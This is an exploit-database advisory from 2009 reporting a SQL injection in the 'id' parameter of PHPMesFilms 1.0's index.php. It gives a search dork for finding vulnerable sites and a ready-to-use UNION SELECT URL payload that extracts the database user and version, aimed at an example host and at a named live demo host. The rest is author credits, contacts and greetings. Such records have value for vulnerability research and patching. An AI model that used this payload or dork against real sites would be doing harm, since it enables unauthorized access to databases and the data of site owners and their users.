PHPMesFilms 1.0 - 'index.php?id' SQL Injection

EDB-ID:

7660


Author:

SuB-ZeRo

Type:

webapps


Platform:

PHP

Date:

2009-01-04


[~] in the name of God
[~]
[~] Download script : http://www.script-masters.com/home/download.php?script=138
[~]
[~]----------------------------------------------------------
[~] Discovered By: SuB-ZeRo(from algeria)   msn: FbH@hotmail.com
[~]
[~] D-unit : SuB-ZeRo & Me!sTer & HaLokA
[~]
[~] Home: www.dz-security.net/ my exploit : www.dz-security.net/subzero
[~]
[~] N0T: We ArE MoUsLiMme WiThE GaZa 4 ever
[~] -----------------------------------------------------------
dork : powered by PhpMesFilms
Exploit:
http://www.sit.com/script/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
---------------------------------------------------------------------------------------------
L!Ve DeMo:
http://phpmesfilms.dyndns.org/demo/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
 not : in this script some times version is 4 and some times is 5 have nice day
[~]----------------------------------------------------------------------
[~] Greetz tO: Me!sTer & HaLoKa & MaXi32 & Dz-TeAm and all algeria & gaza
[~] we are D-unit www.dz-security.net
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]